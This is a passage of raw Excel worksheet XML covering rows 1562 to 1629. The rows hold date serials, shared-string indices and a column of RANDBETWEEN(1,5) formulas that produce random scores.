        <f t="shared" ca="1" si="24"/>
        <v>3</v>
      </c>
    </row>
    <row r="1562" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1562" s="1">
        <v>43529.426689814813</v>
      </c>
      <c r="B1562" t="s">
        <v>19</v>
      </c>
      <c r="C1562" t="s">
        <v>10</v>
      </c>
      <c r="D1562" t="s">
        <v>41</v>
      </c>
      <c r="E1562" t="s">
        <v>1641</v>
      </c>
      <c r="F1562">
        <f t="shared" ca="1" si="24"/>
        <v>4</v>
      </c>
    </row>
    <row r="1563" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1563" s="1">
        <v>43529.420613425929</v>
      </c>
      <c r="B1563" t="s">
        <v>1305</v>
      </c>
      <c r="C1563" t="s">
        <v>48</v>
      </c>
      <c r="E1563" s="2" t="s">
        <v>1642</v>
      </c>
      <c r="F1563">
        <f t="shared" ca="1" si="24"/>
        <v>4</v>
      </c>
    </row>
    <row r="1564" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1564" s="1">
        <v>43529.419988425929</v>
      </c>
      <c r="B1564" t="s">
        <v>5</v>
      </c>
      <c r="C1564" t="s">
        <v>226</v>
      </c>
      <c r="E1564" s="2" t="s">
        <v>1643</v>
      </c>
      <c r="F1564">
        <f t="shared" ca="1" si="24"/>
        <v>1</v>
      </c>
    </row>
    <row r="1565" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1565" s="1">
        <v>43529.405972222223</v>
      </c>
      <c r="B1565" t="s">
        <v>5</v>
      </c>
      <c r="C1565" t="s">
        <v>6</v>
      </c>
      <c r="D1565" t="s">
        <v>25</v>
      </c>
      <c r="E1565" s="2" t="s">
        <v>1644</v>
      </c>
      <c r="F1565">
        <f t="shared" ca="1" si="24"/>
        <v>5</v>
      </c>
    </row>
    <row r="1566" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1566" s="1">
        <v>43529.399953703702</v>
      </c>
      <c r="B1566" t="s">
        <v>13</v>
      </c>
      <c r="C1566" t="s">
        <v>10</v>
      </c>
      <c r="D1566" t="s">
        <v>151</v>
      </c>
      <c r="E1566" t="s">
        <v>1645</v>
      </c>
      <c r="F1566">
        <f t="shared" ca="1" si="24"/>
        <v>2</v>
      </c>
    </row>
    <row r="1567" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1567" s="1">
        <v>43529.39775462963</v>
      </c>
      <c r="B1567" t="s">
        <v>19</v>
      </c>
      <c r="C1567" t="s">
        <v>45</v>
      </c>
      <c r="E1567" s="2" t="s">
        <v>1646</v>
      </c>
      <c r="F1567">
        <f t="shared" ca="1" si="24"/>
        <v>5</v>
      </c>
    </row>
    <row r="1568" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1568" s="1">
        <v>43529.393680555557</v>
      </c>
      <c r="B1568" t="s">
        <v>19</v>
      </c>
      <c r="C1568" t="s">
        <v>10</v>
      </c>
      <c r="D1568" t="s">
        <v>178</v>
      </c>
      <c r="E1568" s="2" t="s">
        <v>1647</v>
      </c>
      <c r="F1568">
        <f t="shared" ca="1" si="24"/>
        <v>4</v>
      </c>
    </row>
    <row r="1569" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1569" s="1">
        <v>43529.391435185185</v>
      </c>
      <c r="B1569" t="s">
        <v>1305</v>
      </c>
      <c r="C1569" t="s">
        <v>461</v>
      </c>
      <c r="E1569" s="2" t="s">
        <v>1648</v>
      </c>
      <c r="F1569">
        <f t="shared" ca="1" si="24"/>
        <v>4</v>
      </c>
    </row>
    <row r="1570" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1570" s="1">
        <v>43529.391226851854</v>
      </c>
      <c r="B1570" t="s">
        <v>19</v>
      </c>
      <c r="C1570" t="s">
        <v>6</v>
      </c>
      <c r="D1570" t="s">
        <v>25</v>
      </c>
      <c r="E1570" s="2" t="s">
        <v>1649</v>
      </c>
      <c r="F1570">
        <f t="shared" ca="1" si="24"/>
        <v>1</v>
      </c>
    </row>
    <row r="1571" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1571" s="1">
        <v>43529.381527777776</v>
      </c>
      <c r="B1571" t="s">
        <v>5</v>
      </c>
      <c r="C1571" t="s">
        <v>71</v>
      </c>
      <c r="E1571" s="2" t="s">
        <v>1650</v>
      </c>
      <c r="F1571">
        <f t="shared" ca="1" si="24"/>
        <v>3</v>
      </c>
    </row>
    <row r="1572" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1572" s="1">
        <v>43529.380902777775</v>
      </c>
      <c r="B1572" t="s">
        <v>13</v>
      </c>
      <c r="C1572" t="s">
        <v>314</v>
      </c>
      <c r="E1572" s="2" t="s">
        <v>1651</v>
      </c>
      <c r="F1572">
        <f t="shared" ca="1" si="24"/>
        <v>3</v>
      </c>
    </row>
    <row r="1573" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1573" s="1">
        <v>43529.355046296296</v>
      </c>
      <c r="B1573" t="s">
        <v>13</v>
      </c>
      <c r="C1573" t="s">
        <v>10</v>
      </c>
      <c r="D1573" t="s">
        <v>163</v>
      </c>
      <c r="E1573" s="2" t="s">
        <v>1652</v>
      </c>
      <c r="F1573">
        <f t="shared" ca="1" si="24"/>
        <v>4</v>
      </c>
    </row>
    <row r="1574" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1574" s="1">
        <v>43529.350138888891</v>
      </c>
      <c r="B1574" t="s">
        <v>19</v>
      </c>
      <c r="C1574" t="s">
        <v>173</v>
      </c>
      <c r="E1574" t="s">
        <v>1653</v>
      </c>
      <c r="F1574">
        <f t="shared" ca="1" si="24"/>
        <v>5</v>
      </c>
    </row>
    <row r="1575" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1575" s="1">
        <v>43529.349733796298</v>
      </c>
      <c r="B1575" t="s">
        <v>19</v>
      </c>
      <c r="C1575" t="s">
        <v>173</v>
      </c>
      <c r="E1575" s="2" t="s">
        <v>1654</v>
      </c>
      <c r="F1575">
        <f t="shared" ca="1" si="24"/>
        <v>5</v>
      </c>
    </row>
    <row r="1576" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1576" s="1">
        <v>43529.332256944443</v>
      </c>
      <c r="B1576" t="s">
        <v>13</v>
      </c>
      <c r="C1576" t="s">
        <v>48</v>
      </c>
      <c r="E1576" s="2" t="s">
        <v>1655</v>
      </c>
      <c r="F1576">
        <f t="shared" ca="1" si="24"/>
        <v>1</v>
      </c>
    </row>
    <row r="1577" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1577" s="1">
        <v>43529.289814814816</v>
      </c>
      <c r="B1577" t="s">
        <v>13</v>
      </c>
      <c r="C1577" t="s">
        <v>41</v>
      </c>
      <c r="E1577" t="s">
        <v>1656</v>
      </c>
      <c r="F1577">
        <f t="shared" ca="1" si="24"/>
        <v>1</v>
      </c>
    </row>
    <row r="1578" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1578" s="1">
        <v>43529.286562499998</v>
      </c>
      <c r="B1578" t="s">
        <v>19</v>
      </c>
      <c r="C1578" t="s">
        <v>48</v>
      </c>
      <c r="E1578" s="2" t="s">
        <v>1657</v>
      </c>
      <c r="F1578">
        <f t="shared" ca="1" si="24"/>
        <v>3</v>
      </c>
    </row>
    <row r="1579" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1579" s="1">
        <v>43529.276365740741</v>
      </c>
      <c r="B1579" t="s">
        <v>5</v>
      </c>
      <c r="C1579" t="s">
        <v>776</v>
      </c>
      <c r="E1579" s="2" t="s">
        <v>1658</v>
      </c>
      <c r="F1579">
        <f t="shared" ca="1" si="24"/>
        <v>1</v>
      </c>
    </row>
    <row r="1580" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1580" s="1">
        <v>43529.269687499997</v>
      </c>
      <c r="B1580" t="s">
        <v>19</v>
      </c>
      <c r="C1580" t="s">
        <v>253</v>
      </c>
      <c r="D1580" t="s">
        <v>33</v>
      </c>
      <c r="E1580" s="2" t="s">
        <v>1659</v>
      </c>
      <c r="F1580">
        <f t="shared" ca="1" si="24"/>
        <v>1</v>
      </c>
    </row>
    <row r="1581" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1581" s="1">
        <v>43529.258437500001</v>
      </c>
      <c r="B1581" t="s">
        <v>9</v>
      </c>
      <c r="C1581" t="s">
        <v>48</v>
      </c>
      <c r="E1581" s="2" t="s">
        <v>1660</v>
      </c>
      <c r="F1581">
        <f t="shared" ca="1" si="24"/>
        <v>2</v>
      </c>
    </row>
    <row r="1582" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1582" s="1">
        <v>43529.254444444443</v>
      </c>
      <c r="B1582" t="s">
        <v>19</v>
      </c>
      <c r="C1582" t="s">
        <v>48</v>
      </c>
      <c r="E1582" s="2" t="s">
        <v>1661</v>
      </c>
      <c r="F1582">
        <f t="shared" ca="1" si="24"/>
        <v>4</v>
      </c>
    </row>
    <row r="1583" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1583" s="1">
        <v>43529.22861111111</v>
      </c>
      <c r="B1583" t="s">
        <v>19</v>
      </c>
      <c r="C1583" t="s">
        <v>48</v>
      </c>
      <c r="E1583" t="s">
        <v>1662</v>
      </c>
      <c r="F1583">
        <f t="shared" ca="1" si="24"/>
        <v>4</v>
      </c>
    </row>
    <row r="1584" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1584" s="1">
        <v>43529.198460648149</v>
      </c>
      <c r="B1584" t="s">
        <v>13</v>
      </c>
      <c r="C1584" t="s">
        <v>48</v>
      </c>
      <c r="E1584" t="s">
        <v>1663</v>
      </c>
      <c r="F1584">
        <f t="shared" ca="1" si="24"/>
        <v>2</v>
      </c>
    </row>
    <row r="1585" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1585" s="1">
        <v>43529.194131944445</v>
      </c>
      <c r="B1585" t="s">
        <v>5</v>
      </c>
      <c r="C1585" t="s">
        <v>71</v>
      </c>
      <c r="E1585" s="2" t="s">
        <v>1664</v>
      </c>
      <c r="F1585">
        <f t="shared" ca="1" si="24"/>
        <v>1</v>
      </c>
    </row>
    <row r="1586" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1586" s="1">
        <v>43529.181527777779</v>
      </c>
      <c r="B1586" t="s">
        <v>5</v>
      </c>
      <c r="C1586" t="s">
        <v>173</v>
      </c>
      <c r="E1586" s="2" t="s">
        <v>1665</v>
      </c>
      <c r="F1586">
        <f t="shared" ca="1" si="24"/>
        <v>5</v>
      </c>
    </row>
    <row r="1587" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A1587" s="1">
        <v>43529.176238425927</v>
      </c>
      <c r="B1587" t="s">
        <v>5</v>
      </c>
      <c r="C1587" t="s">
        <v>41</v>
      </c>
      <c r="E1587" s="2" t="s">
        <v>1666</v>
      </c>
      <c r="F1587">
        <f t="shared" ca="1" si="24"/>
        <v>4</v>
      </c>
    </row>
    <row r="1588" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1588" s="1">
        <v>43529.126655092594</v>
      </c>
      <c r="B1588" t="s">
        <v>5</v>
      </c>
      <c r="C1588" t="s">
        <v>103</v>
      </c>
      <c r="E1588" s="2" t="s">
        <v>1667</v>
      </c>
      <c r="F1588">
        <f t="shared" ca="1" si="24"/>
        <v>2</v>
      </c>
    </row>
    <row r="1589" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1589" s="1">
        <v>43529.115335648145</v>
      </c>
      <c r="B1589" t="s">
        <v>35</v>
      </c>
      <c r="C1589" t="s">
        <v>60</v>
      </c>
      <c r="E1589" s="2" t="s">
        <v>1668</v>
      </c>
      <c r="F1589">
        <f t="shared" ca="1" si="24"/>
        <v>1</v>
      </c>
    </row>
    <row r="1590" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1590" s="1">
        <v>43529.068611111114</v>
      </c>
      <c r="B1590" t="s">
        <v>5</v>
      </c>
      <c r="C1590" t="s">
        <v>73</v>
      </c>
      <c r="E1590" s="2" t="s">
        <v>1669</v>
      </c>
      <c r="F1590">
        <f t="shared" ca="1" si="24"/>
        <v>3</v>
      </c>
    </row>
    <row r="1591" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1591" s="1">
        <v>43529.067291666666</v>
      </c>
      <c r="B1591" t="s">
        <v>5</v>
      </c>
      <c r="C1591" t="s">
        <v>41</v>
      </c>
      <c r="E1591" t="s">
        <v>1670</v>
      </c>
      <c r="F1591">
        <f t="shared" ca="1" si="24"/>
        <v>1</v>
      </c>
    </row>
    <row r="1592" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1592" s="1">
        <v>43529.062326388892</v>
      </c>
      <c r="B1592" t="s">
        <v>13</v>
      </c>
      <c r="C1592" t="s">
        <v>410</v>
      </c>
      <c r="E1592" t="s">
        <v>1671</v>
      </c>
      <c r="F1592">
        <f t="shared" ca="1" si="24"/>
        <v>4</v>
      </c>
    </row>
    <row r="1593" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A1593" s="1">
        <v>43529.056111111109</v>
      </c>
      <c r="B1593" t="s">
        <v>5</v>
      </c>
      <c r="C1593" t="s">
        <v>41</v>
      </c>
      <c r="E1593" s="2" t="s">
        <v>1672</v>
      </c>
      <c r="F1593">
        <f t="shared" ca="1" si="24"/>
        <v>3</v>
      </c>
    </row>
    <row r="1594" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1594" s="1">
        <v>43529.028402777774</v>
      </c>
      <c r="B1594" t="s">
        <v>19</v>
      </c>
      <c r="C1594" t="s">
        <v>41</v>
      </c>
      <c r="E1594" t="s">
        <v>1673</v>
      </c>
      <c r="F1594">
        <f t="shared" ca="1" si="24"/>
        <v>3</v>
      </c>
    </row>
    <row r="1595" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1595" s="1">
        <v>43529.006678240738</v>
      </c>
      <c r="B1595" t="s">
        <v>19</v>
      </c>
      <c r="C1595" t="s">
        <v>10</v>
      </c>
      <c r="D1595" t="s">
        <v>290</v>
      </c>
      <c r="E1595" t="s">
        <v>1674</v>
      </c>
      <c r="F1595">
        <f t="shared" ca="1" si="24"/>
        <v>3</v>
      </c>
    </row>
    <row r="1596" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1596" s="1">
        <v>43528.953101851854</v>
      </c>
      <c r="B1596" t="s">
        <v>13</v>
      </c>
      <c r="C1596" t="s">
        <v>140</v>
      </c>
      <c r="D1596" t="s">
        <v>234</v>
      </c>
      <c r="E1596" s="2" t="s">
        <v>1675</v>
      </c>
      <c r="F1596">
        <f t="shared" ca="1" si="24"/>
        <v>1</v>
      </c>
    </row>
    <row r="1597" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1597" s="1">
        <v>43528.91097222222</v>
      </c>
      <c r="B1597" t="s">
        <v>1305</v>
      </c>
      <c r="C1597" t="s">
        <v>41</v>
      </c>
      <c r="E1597" t="s">
        <v>1676</v>
      </c>
      <c r="F1597">
        <f t="shared" ca="1" si="24"/>
        <v>2</v>
      </c>
    </row>
    <row r="1598" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1598" s="1">
        <v>43528.907210648147</v>
      </c>
      <c r="B1598" t="s">
        <v>1305</v>
      </c>
      <c r="C1598" t="s">
        <v>10</v>
      </c>
      <c r="D1598" t="s">
        <v>336</v>
      </c>
      <c r="E1598" t="s">
        <v>1677</v>
      </c>
      <c r="F1598">
        <f t="shared" ca="1" si="24"/>
        <v>1</v>
      </c>
    </row>
    <row r="1599" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1599" s="1">
        <v>43528.892222222225</v>
      </c>
      <c r="B1599" t="s">
        <v>9</v>
      </c>
      <c r="C1599" t="s">
        <v>10</v>
      </c>
      <c r="D1599" t="s">
        <v>374</v>
      </c>
      <c r="E1599" s="2" t="s">
        <v>1678</v>
      </c>
      <c r="F1599">
        <f t="shared" ca="1" si="24"/>
        <v>4</v>
      </c>
    </row>
    <row r="1600" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1600" s="1">
        <v>43528.876331018517</v>
      </c>
      <c r="B1600" t="s">
        <v>35</v>
      </c>
      <c r="C1600" t="s">
        <v>10</v>
      </c>
      <c r="D1600" t="s">
        <v>52</v>
      </c>
      <c r="F1600">
        <f t="shared" ca="1" si="24"/>
        <v>2</v>
      </c>
    </row>
    <row r="1601" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1601" s="1">
        <v>43528.756030092591</v>
      </c>
      <c r="B1601" t="s">
        <v>35</v>
      </c>
      <c r="C1601" t="s">
        <v>6</v>
      </c>
      <c r="D1601" t="s">
        <v>114</v>
      </c>
      <c r="E1601" t="s">
        <v>1679</v>
      </c>
      <c r="F1601">
        <f t="shared" ca="1" si="24"/>
        <v>1</v>
      </c>
    </row>
    <row r="1602" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1602" s="1">
        <v>43528.738495370373</v>
      </c>
      <c r="B1602" t="s">
        <v>5</v>
      </c>
      <c r="C1602" t="s">
        <v>10</v>
      </c>
      <c r="D1602" t="s">
        <v>6</v>
      </c>
      <c r="E1602" t="s">
        <v>1680</v>
      </c>
      <c r="F1602">
        <f t="shared" ref="F1602:F1665" ca="1" si="25">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="1603" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A1603" s="1">
        <v>43528.735000000001</v>
      </c>
      <c r="B1603" t="s">
        <v>13</v>
      </c>
      <c r="C1603" t="s">
        <v>10</v>
      </c>
      <c r="D1603" t="s">
        <v>33</v>
      </c>
      <c r="E1603" s="2" t="s">
        <v>1681</v>
      </c>
      <c r="F1603">
        <f t="shared" ca="1" si="25"/>
        <v>5</v>
      </c>
    </row>
    <row r="1604" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1604" s="1">
        <v>43528.713171296295</v>
      </c>
      <c r="B1604" t="s">
        <v>19</v>
      </c>
      <c r="C1604" t="s">
        <v>10</v>
      </c>
      <c r="D1604" t="s">
        <v>885</v>
      </c>
      <c r="E1604" t="s">
        <v>1682</v>
      </c>
      <c r="F1604">
        <f t="shared" ca="1" si="25"/>
        <v>3</v>
      </c>
    </row>
    <row r="1605" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1605" s="1">
        <v>43528.696261574078</v>
      </c>
      <c r="B1605" t="s">
        <v>19</v>
      </c>
      <c r="C1605" t="s">
        <v>10</v>
      </c>
      <c r="D1605" t="s">
        <v>46</v>
      </c>
      <c r="E1605" s="2" t="s">
        <v>1683</v>
      </c>
      <c r="F1605">
        <f t="shared" ca="1" si="25"/>
        <v>4</v>
      </c>
    </row>
    <row r="1606" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1606" s="1">
        <v>43528.689780092594</v>
      </c>
      <c r="B1606" t="s">
        <v>19</v>
      </c>
      <c r="C1606" t="s">
        <v>10</v>
      </c>
      <c r="D1606" t="s">
        <v>89</v>
      </c>
      <c r="E1606" s="2" t="s">
        <v>1684</v>
      </c>
      <c r="F1606">
        <f t="shared" ca="1" si="25"/>
        <v>3</v>
      </c>
    </row>
    <row r="1607" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1607" s="1">
        <v>43528.685312499998</v>
      </c>
      <c r="B1607" t="s">
        <v>13</v>
      </c>
      <c r="C1607" t="s">
        <v>10</v>
      </c>
      <c r="D1607" t="s">
        <v>178</v>
      </c>
      <c r="E1607" t="s">
        <v>1685</v>
      </c>
      <c r="F1607">
        <f t="shared" ca="1" si="25"/>
        <v>3</v>
      </c>
    </row>
    <row r="1608" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1608" s="1">
        <v>43528.685104166667</v>
      </c>
      <c r="B1608" t="s">
        <v>13</v>
      </c>
      <c r="C1608" t="s">
        <v>10</v>
      </c>
      <c r="D1608" t="s">
        <v>80</v>
      </c>
      <c r="E1608" s="2" t="s">
        <v>1686</v>
      </c>
      <c r="F1608">
        <f t="shared" ca="1" si="25"/>
        <v>4</v>
      </c>
    </row>
    <row r="1609" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1609" s="1">
        <v>43528.682835648149</v>
      </c>
      <c r="B1609" t="s">
        <v>19</v>
      </c>
      <c r="C1609" t="s">
        <v>10</v>
      </c>
      <c r="D1609" t="s">
        <v>263</v>
      </c>
      <c r="E1609" t="s">
        <v>1687</v>
      </c>
      <c r="F1609">
        <f t="shared" ca="1" si="25"/>
        <v>1</v>
      </c>
    </row>
    <row r="1610" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1610" s="1">
        <v>43528.66165509259</v>
      </c>
      <c r="B1610" t="s">
        <v>5</v>
      </c>
      <c r="C1610" t="s">
        <v>1688</v>
      </c>
      <c r="F1610">
        <f t="shared" ca="1" si="25"/>
        <v>5</v>
      </c>
    </row>
    <row r="1611" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1611" s="1">
        <v>43528.648958333331</v>
      </c>
      <c r="B1611" t="s">
        <v>19</v>
      </c>
      <c r="C1611" t="s">
        <v>10</v>
      </c>
      <c r="D1611" t="s">
        <v>494</v>
      </c>
      <c r="E1611" t="s">
        <v>1689</v>
      </c>
      <c r="F1611">
        <f t="shared" ca="1" si="25"/>
        <v>5</v>
      </c>
    </row>
    <row r="1612" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1612" s="1">
        <v>43528.639861111114</v>
      </c>
      <c r="B1612" t="s">
        <v>5</v>
      </c>
      <c r="C1612" t="s">
        <v>10</v>
      </c>
      <c r="D1612" t="s">
        <v>11</v>
      </c>
      <c r="E1612" t="s">
        <v>1690</v>
      </c>
      <c r="F1612">
        <f t="shared" ca="1" si="25"/>
        <v>4</v>
      </c>
    </row>
    <row r="1613" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1613" s="1">
        <v>43528.623379629629</v>
      </c>
      <c r="B1613" t="s">
        <v>1305</v>
      </c>
      <c r="C1613" t="s">
        <v>10</v>
      </c>
      <c r="D1613" t="s">
        <v>374</v>
      </c>
      <c r="E1613" t="s">
        <v>1691</v>
      </c>
      <c r="F1613">
        <f t="shared" ca="1" si="25"/>
        <v>5</v>
      </c>
    </row>
    <row r="1614" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A1614" s="1">
        <v>43528.615856481483</v>
      </c>
      <c r="B1614" t="s">
        <v>19</v>
      </c>
      <c r="C1614" t="s">
        <v>10</v>
      </c>
      <c r="D1614" t="s">
        <v>56</v>
      </c>
      <c r="E1614" s="2" t="s">
        <v>1692</v>
      </c>
      <c r="F1614">
        <f t="shared" ca="1" si="25"/>
        <v>3</v>
      </c>
    </row>
    <row r="1615" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1615" s="1">
        <v>43528.614189814813</v>
      </c>
      <c r="B1615" t="s">
        <v>19</v>
      </c>
      <c r="C1615" t="s">
        <v>6</v>
      </c>
      <c r="D1615" t="s">
        <v>67</v>
      </c>
      <c r="E1615" t="s">
        <v>1693</v>
      </c>
      <c r="F1615">
        <f t="shared" ca="1" si="25"/>
        <v>2</v>
      </c>
    </row>
    <row r="1616" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1616" s="1">
        <v>43528.612847222219</v>
      </c>
      <c r="B1616" t="s">
        <v>5</v>
      </c>
      <c r="C1616" t="s">
        <v>10</v>
      </c>
      <c r="D1616" t="s">
        <v>11</v>
      </c>
      <c r="E1616" t="s">
        <v>1694</v>
      </c>
      <c r="F1616">
        <f t="shared" ca="1" si="25"/>
        <v>2</v>
      </c>
    </row>
    <row r="1617" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1617" s="1">
        <v>43528.600972222222</v>
      </c>
      <c r="B1617" t="s">
        <v>5</v>
      </c>
      <c r="C1617" t="s">
        <v>10</v>
      </c>
      <c r="D1617" t="s">
        <v>112</v>
      </c>
      <c r="E1617" t="s">
        <v>1695</v>
      </c>
      <c r="F1617">
        <f t="shared" ca="1" si="25"/>
        <v>5</v>
      </c>
    </row>
    <row r="1618" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1618" s="1">
        <v>43528.599120370367</v>
      </c>
      <c r="B1618" t="s">
        <v>5</v>
      </c>
      <c r="C1618" t="s">
        <v>10</v>
      </c>
      <c r="D1618" t="s">
        <v>271</v>
      </c>
      <c r="E1618" t="s">
        <v>1696</v>
      </c>
      <c r="F1618">
        <f t="shared" ca="1" si="25"/>
        <v>4</v>
      </c>
    </row>
    <row r="1619" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1619" s="1">
        <v>43528.585011574076</v>
      </c>
      <c r="B1619" t="s">
        <v>1305</v>
      </c>
      <c r="C1619" t="s">
        <v>10</v>
      </c>
      <c r="D1619" t="s">
        <v>163</v>
      </c>
      <c r="E1619" s="2" t="s">
        <v>1697</v>
      </c>
      <c r="F1619">
        <f t="shared" ca="1" si="25"/>
        <v>3</v>
      </c>
    </row>
    <row r="1620" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1620" s="1">
        <v>43528.584918981483</v>
      </c>
      <c r="B1620" t="s">
        <v>1305</v>
      </c>
      <c r="C1620" t="s">
        <v>10</v>
      </c>
      <c r="D1620" t="s">
        <v>163</v>
      </c>
      <c r="E1620" s="2" t="s">
        <v>1697</v>
      </c>
      <c r="F1620">
        <f t="shared" ca="1" si="25"/>
        <v>1</v>
      </c>
    </row>
    <row r="1621" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1621" s="1">
        <v>43528.571909722225</v>
      </c>
      <c r="B1621" t="s">
        <v>19</v>
      </c>
      <c r="C1621" t="s">
        <v>10</v>
      </c>
      <c r="D1621" t="s">
        <v>80</v>
      </c>
      <c r="E1621" t="s">
        <v>1698</v>
      </c>
      <c r="F1621">
        <f t="shared" ca="1" si="25"/>
        <v>5</v>
      </c>
    </row>
    <row r="1622" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1622" s="1">
        <v>43528.568148148152</v>
      </c>
      <c r="B1622" t="s">
        <v>13</v>
      </c>
      <c r="C1622" t="s">
        <v>10</v>
      </c>
      <c r="D1622" t="s">
        <v>6</v>
      </c>
      <c r="E1622" s="2" t="s">
        <v>1699</v>
      </c>
      <c r="F1622">
        <f t="shared" ca="1" si="25"/>
        <v>2</v>
      </c>
    </row>
    <row r="1623" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1623" s="1">
        <v>43528.566736111112</v>
      </c>
      <c r="B1623" t="s">
        <v>5</v>
      </c>
      <c r="C1623" t="s">
        <v>10</v>
      </c>
      <c r="D1623" t="s">
        <v>374</v>
      </c>
      <c r="E1623" t="s">
        <v>1700</v>
      </c>
      <c r="F1623">
        <f t="shared" ca="1" si="25"/>
        <v>5</v>
      </c>
    </row>
    <row r="1624" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A1624" s="1">
        <v>43528.544398148151</v>
      </c>
      <c r="B1624" t="s">
        <v>13</v>
      </c>
      <c r="C1624" t="s">
        <v>10</v>
      </c>
      <c r="D1624" t="s">
        <v>36</v>
      </c>
      <c r="E1624" s="2" t="s">
        <v>1701</v>
      </c>
      <c r="F1624">
        <f t="shared" ca="1" si="25"/>
        <v>3</v>
      </c>
    </row>
    <row r="1625" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1625" s="1">
        <v>43528.534560185188</v>
      </c>
      <c r="B1625" t="s">
        <v>19</v>
      </c>
      <c r="C1625" t="s">
        <v>10</v>
      </c>
      <c r="D1625" t="s">
        <v>158</v>
      </c>
      <c r="E1625" s="2" t="s">
        <v>1702</v>
      </c>
      <c r="F1625">
        <f t="shared" ca="1" si="25"/>
        <v>2</v>
      </c>
    </row>
    <row r="1626" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1626" s="1">
        <v>43528.528946759259</v>
      </c>
      <c r="B1626" t="s">
        <v>19</v>
      </c>
      <c r="C1626" t="s">
        <v>6</v>
      </c>
      <c r="D1626" t="s">
        <v>114</v>
      </c>
      <c r="E1626" t="s">
        <v>1703</v>
      </c>
      <c r="F1626">
        <f t="shared" ca="1" si="25"/>
        <v>4</v>
      </c>
    </row>
    <row r="1627" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1627" s="1">
        <v>43528.509270833332</v>
      </c>
      <c r="B1627" t="s">
        <v>5</v>
      </c>
      <c r="C1627" t="s">
        <v>10</v>
      </c>
      <c r="D1627" t="s">
        <v>52</v>
      </c>
      <c r="E1627" t="s">
        <v>1704</v>
      </c>
      <c r="F1627">
        <f t="shared" ca="1" si="25"/>
        <v>4</v>
      </c>
    </row>
    <row r="1628" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1628" s="1">
        <v>43528.5075</v>
      </c>
      <c r="B1628" t="s">
        <v>19</v>
      </c>
      <c r="C1628" t="s">
        <v>10</v>
      </c>
      <c r="D1628" t="s">
        <v>80</v>
      </c>
      <c r="E1628" t="s">
        <v>1705</v>
      </c>
      <c r="F1628">
        <f t="shared" ca="1" si="25"/>
        <v>5</v>
      </c>
    </row>
    <row r="1629" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1629" s="1">
        <v>43528.505196759259</v>
      </c>
      <c r="B1629" t="s">
        <v>9</v>
      </c>
      <c r="C1629" t="s">
        <v>10</v>
      </c>
      <c r="D1629" t="s">
        <v>192</v>
      </c>
      <c r="E1629" s="2" t="s">
        <v>1706</v>
      </c>
      <c r="F1629">
        <f t="shared" ca="1" si="25"/>
        <v>4</v>
      </c>
    </row>
